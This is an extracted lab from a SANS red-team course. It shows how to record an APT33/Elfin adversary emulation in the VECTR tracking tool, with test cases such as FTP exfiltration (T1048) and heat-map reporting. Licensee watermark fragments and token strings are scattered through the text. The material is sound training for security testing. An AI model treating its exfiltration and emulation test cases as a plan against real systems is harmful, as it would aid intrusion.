In this section, you will use the Adversary Emulation Plan created for APT33/Elfin in the Consuming Threat  Intelligence lab to create a Campaign Template in VECTR. Campaign templates are valuable for Reporting,  Exercise Replay, Retesting TTPs, and reoccuring control validation testing.   

SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-7

© SANS Institute 2020

5. Click “NEW” at the top right of the Assessment Group; this is the name of the complete effort. In this case,  SEC564 Target Red Team Exercise. We will add the blind Adversary Emulation campaign that was  performed during the course. Later, you can add other assessments for replay, Purple Team, and Retests:    

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected] Ap ril

 

o.

co

m

>

  6. Fill out the following fields and click “Save”:      Name: APT33/Elfin Adversary Emulation

ho

22829180 @ ya

Description: APT33/Elfin Adversary Emulation for SEC564 Target

i< an

nm

ak

er

Kill Chain: Unified Kill Chain

nc o

ln

M

az

ze

Lincoln Mazzei

 

 

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-8

© SANS Institute 2020

7. Click “Administration” on the menu on the left to see the Administration submenu. Note that anything created  under “Administration” can be used across Assessments and Databases. Any Test Cases or Campaigns created in an  individual Assessment are ad‐hoc for that particular assessment. 

  Click “Campaign Templates” 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

 

Li

ce

ns

ed

8. Click “NEW CAMPAIGN” 

live   SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-9

© SANS Institute 2020

9. Fill out the following fields and click “Save”:      Name: APT33/Elfin - Manual

Description: APT33/Elfin Manual Test Case Creation

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] @ ya

ho

22829180

 

 

i< an

nm

ak

er

A new view will appear on the right for the campaign. As no test cases were selected in previous step, it  will be blank.     There are two methods for adding a Test Case to a campaign, linking an already created Test Case or  creating a new Test Case from scratch. We will cover both methods.    10. To add or link an existing Test Case to a campaign, click “EDIT” on the top right of the Campaign window: 

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

11. In the “Edit Assessment” window, search in the filter field for TTPs used by APT33/Elfin as identified in the  Consuming Threat Intelligence lab. Note that not all organizations map by MITRE ATT&CKTM ID and you  may need to search for other fields.       Search for: schtask    SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-10

© SANS Institute 2020

 

Check the “Include” box and click “Save”:

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

>

Ap ril

[email protected] co

m

 

o.

12. To create a Test Case that you did not find in the pre‐populated database, click “NEW TEST CASE”: 

22829180 i< an

nm

ak

er

@ ya

ho

 

ln

M

az

ze

Lincoln Mazzei nc o

The Test Case window is where the core documentation of test cases occurs. Every Red Team action  should be documented here along with the Blue Team Analysis and Response. As we are in the  “Administration” section, only document the details that are broad and will be reused in various exercises.  Fill out the below fields, which are generic to APT33/Elfin and click “Save”:    Name: FTP Data Exfiltration

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

Description: APT33/Elfin used FTP to exfiltrate data. This is separate than C2. Outbound TCP/21

live

Technique: Exfiltration Over Alternative Protocol Attacker Tools: Built in FTP client Expected Detection Layers: Firewall; Web Gateway; Behavior Analytics SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-11

© SANS Institute 2020

Click the Gear next to “Red Team Details” to add the MITRE ID: T1048  

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

m

>

Ap ril

[email protected] co

 

o.

13. Continue to populate and add all the Test Cases from the Adversary Emulation Plan you created on Lab  1.1. Once completed, you should have a Campaign Template that matches TTPs identified as being in use  by APT33/Elfin and were tested as part of your Adversary Emulation: 

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

 

live

14. Click “Assessments” from the menu on the left to go back to the Assessments screen: 

SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-12

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected]  

o.

co

m

>

Ap ril

15. Click on the gear icon to edit the APT33/Elfin Adversary Emulation assessment: 

er

 

@ ya

ho

22829180

 

i< an

nm

ak

16. Click “NEW CAMPAIGN” 

ln

M

az

ze

Lincoln Mazzei nc o

 

17. Fill out the following fields and click “Save”:      Name: Red Team Exercise

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

Template: APT33/Elfin – Manual

Li

Description: Blind Red Team Exercise

live

Note that selecting the Campaign Template will allow you to perform similar Adversary Emulations for  Exercise Replay, Retesting, Purple Teaming, and/or Control Validation in the future.   

SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-13

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected] >

Ap ril

  Click “Assessments” from the menu on the left to go back to the Assessments screen. 

m

Click the list icon next to the new campaign you created: 

o.

co

18.   19.

nm

i< an

20. Click “LOAD” to get detailed campaign view:   

 

ak

er

@ ya

ho

22829180

ln

M

az

ze

Lincoln Mazzei nc o

 

  You should see a nice graph of the Adversary Emulation Plan you created in Lab 1.1: 

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live   SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-14

© SANS Institute 2020

  21. Scroll down to the Test Cases and select the gear icon of the one you want to populate:   

090aff33bcb6e401ded410120bc9a268  

Populate the fields by clicking the gear icon for each one, then the + sign: 

26 ,2 02 0

Any changes made here will be unique for this campaign in this assessment group. This will not modify the  Campaign Templates we created earlier.  

o.

co

m

>

Ap ril

[email protected] 22829180

 

@ ya

ho

Name: Linux VM

ak

er

Platform Type: Linux

i< an

nm

Description: Slingshot

ln

M

az

ze

Lincoln Mazzei

Do the same for the Target Assets:    Name: Endpoint02

nc o

Platform Type: Windows

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

Li

Description: Dani HR Windows 10

ns

ed

Phases: Select All

Li

ce

If VECTR was used from the beginning of the exercise, you may use the Status on the left to log times of  Attack Start and Stop automatically by using the Play and Pause button. As it was manual, click the Stop.  

live

As we are performing this as part of Exercise Closure, manually input the start and stop time of this Test  Case by clicking the gear next to “Attack Start”:  Team: Red Date: SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-15

© SANS Institute 2020

Time: Description: Email with malicious link sent Do the same for Attack Stop. Click Save on the bottom right. 

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Feel free to fill out the Blue Team section. The details, outcomes, detection time, etc. would all come from  the Blue Team through the Project Manager as the Analysis and Response is performed. This is out of  scope of the lab. 

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180 Lincoln Mazzei ze

 

nc o

ln

M

az

22. Continue populating the Test Cases you created in the campaign to match the notes from your Adversary  Emulation.               

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-16

© SANS Institute 2020

Explore VECTR’s Reporting and Timeline capabilities

Now, we will look at how Reporting works when leveraging VECTR. We will use data that has been populated  by the SRA team and comes default in VECTR.    23. We will use a different, prepopulated database. Click the Database icon on the top right and “Select  Session Database”:   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

m

>

Ap ril

[email protected] co

 

o.

Select DEMO_PURPLE_CE and click “Done”:   

i< an

nm

ak

er

@ ya

ho

22829180

ln

M

az

ze

Lincoln Mazzei  

nc o

 

24. Click “Reporting” from the menu on the left: 

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live   SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-17

© SANS Institute 2020

Here, you will see several drop downs to zero in on the Assessments, Campaigns, and Test Cases you want  to investigate: 

 

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Click “Report Type” and select “Heat Map” to view the MITRE ATT&CKTM Heat Map view similar to   ATT&CKTM Navigator view from Lab 1.1. Click on the gray under “No Test Coverage” to filter those out:   

Ap ril

[email protected] m

>

 

co

 

o.

This is a more concise view of the assessment group and the various campaigns completed. As you can see,  the mapping is to MITRE ATT&CKTM with the Tactics on the top row and the various Techniques in the  middle rows. The numbers next to each Technique represent the different Procedures that were tested.  Click on one Technique with a number next to it: 

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

 

live SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-18

© SANS Institute 2020

25. Click “Historical Trending” from the menu on the left: 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected]  

o.

co

m

>

Ap ril

This view is for trends around total risk, toolset, and detection/prevention layers for all assessments in a  database. The top panel has the Risk Trend Analysis over time. This is a great view to show how Red and  Purple Teaming has improved the overall security stance. The bottom panel is the Toolset and  Detection/Prevention Layer trends. This may be used to identify the toolset or defensive layer that  requires the most investment in tuning. Click around to get a better understanding: 

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live   SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-19

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected] Ap ril

 

m

>

Conclusion 

o.

co

VECTR’s primary purpose is to coordinate and document Red and Blue team activities during Adversary  Emulations.  Depending on the organization and scope, this is may be performed in the style of a Purple Team  Exercise or a blind Red Team Adversary Emulation where the Blue Team input is delayed until the Analysis and  Response phase.  VECTR can also be used to track historical Red Team Exercises.  The VECTR Test Cases  created can be used to inform testing events that can be run to test a target or confirm remediation results.    This lab involved the creation of a Red Team‐focused Adversary Emulation Plan, and if you continue to create  a complete active Assessment in VECTR, running actual tests against a network and filling in all the start/stop  times for your Test Cases, you can use VECTR to generate timeline reports.  If you then work together with the  Blue Team response, you will be able to use the full array of VECTR reporting like the provided sample data.    The value in VECTR’s tracking lies in the creation of a clear long‐term test case library, the ability to compare  security testing events to the MITRE ATT&CKTM framework, and reporting artifacts that can be generated by  performing repeated tests against a network or target.  

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

 

ce

ns

ed

This lab introduced the free VECTR tool for creating, tracking, and reporting Adversary Emulations.  For more  details on using VECTR for Red Team or Purple Team tracking, see how‐to videos on the VECTR GitHub page:  https://github.com/SecurityRiskAdvisors/VECTR/wiki/How‐To‐Videos 

live SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-20
SANS - SEC564 RED Team Exercises and Adversary Emulation 2020

Related documents

SANS - SEC564 RED Team Exercises and Adversary Emulation 2020
SANS - SEC564 RED Team Exercises and Adversary Emulation 2020

415 Pages • 103,492 Words • PDF • 53.4 MB

Exercises already and yet
Exercises already and yet

8 Pages • 575 Words • PDF • 155.3 KB

Nancy M - Other Conditionals Theory and Exercises
Nancy M - Other Conditionals Theory and Exercises

12 Pages • 439 Words • PDF • 669.2 KB

food and quantity exercises 2
food and quantity exercises 2

3 Pages • 230 Words • PDF • 1.6 MB

The Passive Voice - Exercises
The Passive Voice - Exercises

7 Pages • 185 Words • PDF • 1.6 MB

Unit 1 The hospital team
Unit 1 The hospital team

1 Pages • 174 Words • PDF • 107.5 KB

Red Hot Chilipeppers - Mother\'s Milk
Red Hot Chilipeppers - Mother\'s Milk

114 Pages • PDF • 23.3 MB

Kill Team - Necrons Command Roster
Kill Team - Necrons Command Roster

1 Pages • 229 Words • PDF • 413.9 KB

Luana Koicheff Clothes and colours (3) Exercises.
Luana Koicheff Clothes and colours (3) Exercises.

2 Pages • 21 Words • PDF • 265.1 KB

GNB-09 Humility, Worship and our Adversary the Devil 070318AM
GNB-09 Humility, Worship and our Adversary the Devil 070318AM

10 Pages • 3,985 Words • PDF • 159.9 KB

Lesson 17 - Gerunds and Infinitives Exercises
Lesson 17 - Gerunds and Infinitives Exercises

1 Pages • PDF • 313.8 KB

Red Hat Linux Security And Optimization
Red Hat Linux Security And Optimization

721 Pages • 204,505 Words • PDF • 5.1 MB